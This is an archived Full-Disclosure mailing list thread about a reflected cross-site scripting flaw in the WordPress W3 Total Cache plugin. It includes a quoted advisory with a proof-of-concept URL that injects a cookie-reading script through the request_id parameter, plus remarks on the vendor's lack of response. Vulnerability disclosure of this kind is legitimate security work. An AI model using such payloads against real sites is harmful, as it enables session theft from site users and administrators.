lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <CA+fhm97C12bsCZPLXZk2xiUZMSexPDTYNNhmj0AxHD-R3uBkgQ@mail.gmail.com>
Date: Thu, 22 Sep 2016 18:08:44 -0300
From: "Fernando A. Lagos Berardi" <fernando@...ial.org>
To: fulldisclosure@...lists.org
Subject: Re: [FD] XSS Wordpress W3 Total Cache <= 0.9.4.1

Hi Simon,

I have found this vulnerability 1 year ago (july 2015). I've tried to
contact them many times but no answers.

cheers,
Fernando



2016-09-22 5:28 GMT-03:00 Simon Rawet <sr@...post24.com>:

> Hi Fernando,
>
> Do you have a timeline for this issue?
>
> Additionally do you have any contact details for the w3tc team you could
> share? All my attempts to contact them have fallen short.
>
>
> On 21/09/16 13:56, Fernando A. Lagos Berardi wrote:
> > [+] Description: Cross-Site Scripting vulnerability was found on
> Wordpress
> > W3 Total Cache (w3tc) plugin.
> > [+] Plugin Version tested: <= 0.9.4.1 (latest)
> > [+] Wordpress version tested: 4.0.0 - 4.6.1 (latest)
> >
> > ------------------------------
> >
> > [+] Component: W3 Total Cache Admin (performance menu) -> Support -> Add
> > new ticket
> > [+] Variable: request_id
> > [+] Method: GET
> >
> > -------------------------------
> >
> > [+] Affected URL:
> > https://labs.nivel4.net/wordpress/wp-admin/admin.php?
> page=w3tc_support&request_type=bug_report&payment&url=
> http://example.org&name=test&email=test%40gmail.com&
> twitter&phone&subject=test&description=test&forum_url&wp_
> login&wp_password&ftp_host&ftp_login&ftp_password&
> subscribe_releases&subscribe_customer&w3tc_error=support_
> request&request_id=XSS_PAYLOAD_HERE
> >
> > ---------------------------------
> >
> > [+] POC:
> > https://labs.nivel4.net/wordpress/wp-admin/admin.php?
> page=w3tc_support&request_type=bug_report&payment&url=
> http://example.org&name=test&email=test%40gmail.com&
> twitter&phone&subject=test&description=test&forum_url&wp_
> login&wp_password&ftp_host&ftp_login&ftp_password&
> subscribe_releases&subscribe_customer&w3tc_error=support_
> request&request_id=11111666
> > "><DEFANGED_script>alert(document.cookie)<%2Fscript>
> >
> >
> > [+] More info:
> > https://blog.zerial.org/seguridad/vulnerabilidad-
> cross-site-scripting-en-wordpress-w3-total-cache/
> >
> >
>
> --
> Best Regards,
> -----------------------------------------------------
> Simon Rawet
> Web Application Analyst, Outpost24 AB
> Skeppsbrokajen 8 | 371 33 Karlskrona | Sweden
> T: +46 708 474 323
> ---Outpost24 - Vulnerability Management Made Easy!---
>
>
>


-- 
Fernando A. Lagos Berardi - Zerial
Seguridad Informatica
Linux User #382319
Blog: http://blog.zerial.org

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ